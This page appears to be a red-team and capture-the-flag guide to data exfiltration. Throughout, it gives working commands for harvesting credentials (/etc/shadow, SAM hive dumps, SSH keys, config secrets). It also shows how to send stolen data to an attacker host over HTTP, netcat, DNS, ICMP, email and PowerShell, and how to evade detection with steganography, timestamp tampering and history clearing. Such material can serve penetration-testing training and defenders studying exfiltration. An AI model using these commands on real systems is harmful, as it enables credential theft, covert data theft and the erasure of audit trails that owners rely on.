Exfiltration & Data Theft
Exfiltration & Data Theft Techniques — Loot. Compress. Vanish.
Once access is achieved, the mission shifts from exploitation to exfiltration — extracting valuable data, credentials, or flags while avoiding detection. This guide covers real-world methods to gather, compress, and stealthily exfiltrate data from compromised systems, both manually and automatically.
I. 🧩 Core Concepts
Exfiltration
Transferring sensitive data from the target to your system.
Loot
Valuable artifacts: flags, passwords, tokens, databases, keys.
Compression
Reducing file size for stealth and speed.
Encryption
Concealing the contents of exfiltrated data.
Stealth
Avoiding detection by monitoring tools, firewalls, or logs.
II. 🧠 Identify What to Exfiltrate
🔍 Primary Targets
Credentials
/etc/shadow, SAM/NTDS.dit, browser creds, SSH keys
Configs
/var/www/html/config.php, .env, wp-config.php
Databases
MySQL, SQLite, PostgreSQL dumps
Logs
/var/log/auth.log, event logs
Flags / Secrets
flag.txt, API tokens, encryption keys
III. ⚙️ Data Collection Techniques
🧩 1. File Searching
find / -type f -iname "*flag*" 2>/dev/null
find / -type f -name "*.conf" -o -name "*.log"🧠 2. Keyword Extraction
grep -ri "password" /var/www 2>/dev/null
grep -ri "key" /home 2>/dev/null🧩 3. Database Dumping
mysqldump -u root -p database > dump.sql
sqlite3 database.db .dump > dump.txt💣 4. Credential Harvesting
cat /etc/passwd
cat /etc/shadow
find /home -name "id_rsa" 2>/dev/nullWindows:
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
reg save HKLM\SECURITY securityThen extract:
secretsdump.py -sam sam -system system -security security LOCALIV. 🧰 Compressing & Packaging Data
🧩 Linux Compression
tar czf loot.tar.gz /etc/passwd /var/www/html⚙️ Password-Protected Zip
zip -rP 'Sup3rS3cr3t!' data.zip /home/user/loot/🧠 Encrypt Before Exfil
gpg -c loot.tar.gz(Enter passphrase → creates loot.tar.gz.gpg)
V. 🌐 Exfiltration Methods
🔹 1. HTTP (Quick & Simple)
Attacker:
python3 -m http.server 8000Victim:
curl -F "[email protected]" http://10.10.14.2:8000/uploador:
wget --post-file=loot.tar.gz http://10.10.14.2/upload🔹 2. Reverse File Transfer (Netcat)
Attacker (Receiver):
nc -lvnp 4445 > loot.tar.gzVictim:
cat loot.tar.gz | nc 10.10.14.2 4445🔹 3. SCP / SFTP
scp /tmp/loot.tar.gz [email protected]:/tmp/or use SSH key injection for stealth.
🔹 4. Exfil via HTTP Request (Stealth)
curl -X POST -d "data=$(cat flag.txt)" http://10.10.14.2/loot🔹 5. DNS Exfiltration (Covert)
Encode and send data in DNS queries:
for line in $(cat flag.txt | base32); do
host $line.attacker.com
doneServer-side (attacker):
sudo tcpdump -i eth0 udp port 53 -n🔹 6. ICMP Exfiltration
ping -p "$(xxd -p flag.txt)" 10.10.14.2Attacker captures:
tcpdump -i tun0 icmp -X🔹 7. FTP / SMB Exfil
Upload loot through insecure file shares:
ftp 10.10.14.2
put loot.zipor:
smbclient //10.10.14.2/share -U user -c "put loot.tar.gz"🔹 8. Email Exfil (Stealthy)
echo "FLAG: $(cat /root/flag.txt)" | mail -s "Daily Report" [email protected]VI. 💀 Large File Stealth Exfiltration
🧠 Chunked Uploads
split -b 1M loot.tar.gz chunk_
for i in chunk_*; do curl -F "file=@$i" http://10.10.14.2/upload; done⚙️ Covert Timing Channel
while read -r char; do
ping -c 1 -W 1 10.10.14.2 -p $char
done < flag.txtVII. 🧩 Advanced Exfil Tools
Nishang (PowerShell)
Includes multiple exfil modules
Exfiltrator-CLI
Command-line exfil framework
DNSExfiltrator
Base32-encoded DNS data exfil
DataSiphon
Stealth exfil tool using HTTP/DNS blending
Metasploit post modules
Exfil credentials and files from sessions
Empire modules
PowerShell-based exfiltration automation
VIII. 🧠 Data Hiding Before Exfiltration
🔹 Steganography
steghide embed -cf image.jpg -ef loot.txt -p secretExtract later:
steghide extract -sf image.jpg -p secret🔹 Encode Files
cat loot.tar.gz | base64 > loot.b64🔹 Compress, Encode, Encrypt (Triple Stack)
tar czf - loot/ | gpg -c | base64 > loot.encIX. ⚔️ Full Exfiltration Workflow Example
# 1. Gather data
find / -type f -iname "*flag*" > loot.txt
# 2. Compress
tar czf loot.tar.gz -T loot.txt
# 3. Encrypt
gpg -c loot.tar.gz
# 4. Exfiltrate
cat loot.tar.gz.gpg | nc 10.10.14.2 4445X. 🧰 Windows-Specific Exfiltration
🔹 Copy System Files
copy C:\Users\Admin\Documents\*.docx C:\Temp\
Compress-Archive -Path C:\Temp -DestinationPath loot.zip🔹 Encode + Send via PowerShell
$bytes = [System.IO.File]::ReadAllBytes("loot.zip")
$encoded = [System.Convert]::ToBase64String($bytes)
Invoke-WebRequest -Uri "http://10.10.14.2/upload" -Method POST -Body $encoded🔹 SMB Pull
smbclient //victim/C$ -U user -c "get loot.zip"XI. 🧠 Anti-Detection Techniques
Timing Jitter
Delay packets to mimic normal traffic.
Protocol Mimicry
Use HTTP/HTTPS headers like browsers.
Compression + Encryption
Reduce signatures, evade DLP.
Filename Spoofing
Name files like report.log or backup.tar.
Fragmentation
Split into chunks, reassemble later.
Example (timed exfil):
while read -r line; do
curl -X POST -d "msg=$line" http://10.10.14.2/api/upload
sleep 2
done < flag.txtXII. 🧠 Pro Tips & Red Team Tricks
✅ Operational Security
Always encrypt loot before transfer.
Change timestamps with
touch -t 202312120101 file.Delete logs after exfil:
history -c && rm -rf ~/.bash_history
✅ Data Discipline
Maintain loot structure:
/loot/ ├── creds/ ├── flags/ ├── configs/ └── screenshots/
✅ Stealth
Use proxychains or tunnels (Chisel/SSH).
Obfuscate filenames (
report.tmp,sysdata.log).
✅ Post-Exfil Cleanup
shred -u loot.tar.gz.gpgRemove staging dirs, clear temp folders.
XIII. ⚙️ Quick Reference Table
Netcat
`cat file
nc IP PORT`
HTTP
curl -F "file=@f" URL
Blends in
SCP
scp file user@host:
Secure, traceable
DNS
host data.attacker.com
Covert
ICMP
ping -p data IP
Very covert
Stego
steghide embed ...
Visual disguise
Zip+Enc
zip -rP 'pw' data.zip
Encrypted
PowerShell
Invoke-WebRequest ...
Stealth on Windows
XIV. 🧩 Real-World Exfil Example (CTF Workflow)
# Attacker
nc -lvnp 4445 > loot.tar.gz.gpg
# Victim
tar czf - /home /var/www | gpg -c | nc 10.10.14.2 4445Decrypt after exfil:
gpg -d loot.tar.gz.gpg | tar xzLast updated
Was this helpful?